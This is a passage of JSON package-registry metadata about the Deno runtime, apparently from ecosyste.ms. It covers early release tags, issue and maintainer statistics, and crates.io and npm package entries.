hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T15:22:18.447Z","dependent_packages_count":0,"downloads":1772,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/lib_deno_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/lib_deno_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/lib_deno_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/lib_deno_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-20T18:02:27.266Z","updated_at":"2024-11-20T18:02:27.266Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161875,"name":"@deno/win32-arm64","ecosystem":"npm","description":"win32-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:24:01.860Z","latest_release_published_at":"2026-08-27T17:35:42.099Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-08T04:11:16.571Z","created_at":"2024-12-12T22:00:15.515Z","updated_at":"2026-09-08T04:11:16.571Z","registry_url":"https://www.npmjs.com/package/@deno/win32-arm64","install_command":"npm install @deno/win32-arm64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno",